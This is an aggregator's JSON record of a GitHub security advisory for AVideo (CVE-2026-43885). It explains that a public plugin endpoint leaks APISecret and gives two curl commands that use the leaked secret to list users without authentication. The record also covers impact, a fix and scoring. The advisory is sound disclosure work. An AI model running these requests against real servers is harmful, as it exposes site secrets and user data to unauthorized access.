{"uuid":"GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-","url":"https://github.com/advisories/GHSA-xr49-f4rh-qcjf","title":"AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization","description":"### Summary\nAn unauthenticated user can read `APISecret` from `objects/plugins.json.php` and use it to call protected API endpoints (e.g. `users_list`) without logging in.\n\n### Details\n`objects/plugins.json.php` is public and still exposes plugin `object_data` containing `APISecret`. That secret is accepted by `plugin/API/get.json.php` as authentication.\n\n### PoC\n1. Get plugin config (contains `APISecret`):\n```bash\ncurl 'http://\u003chost\u003e/objects/plugins.json.php'\n```\n\u003cimg width=\"879\" height=\"94\" alt=\"image\" src=\"https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb\" /\u003e\n\n2. Copy `APISecret` from the response, then call the API directly:\n```bash\ncurl --get 'http://\u003chost\u003e/plugin/API/get.json.php' \\\n  --data-urlencode 'APIName=users_list' \\\n  --data-urlencode 'APISecret=\u003cAPISecret\u003e' \\\n  --data-urlencode 'rowCount=3' \\\n  --data-urlencode 'current=1'\n```\n\u003cimg width=\"1719\" height=\"170\" alt=\"image\" src=\"https://github.com/user-attachments/assets/edd629be-e75c-40a2-a52f-2f2e6da99b79\" /\u003e\n\n### Impact\nUnauthenticated disclosure of sensitive configuration (`APISecret`), leading to unauthorized access to protected API data.\n\n### Recommended fix\nRequire admin authentication for the full plugin inventory/config endpoint.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-05T22:20:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/WWBN/AVideo/security/advisories/GHSA-xr49-f4rh-qcjf","https://github.com/WWBN/AVideo/commit/1c36f229d0a103528fb9f64d0a1cc0e1e8f5999b","https://nvd.nist.gov/vuln/detail/CVE-2026-43885","https://github.com/advisories/GHSA-xr49-f4rh-qcjf"],"source_kind":"github","identifiers":["GHSA-xr49-f4rh-qcjf","CVE-2026-43885"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T23:00:08.441Z","updated_at":"2026-05-14T12:00:29.391Z","epss_percentage":0.0005,"epss_percentile":0.15521,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-","packages":[{"ecosystem":"packagist","package_name":"wwbn/avideo","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 29.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-/related_packages","related_advisories":[]}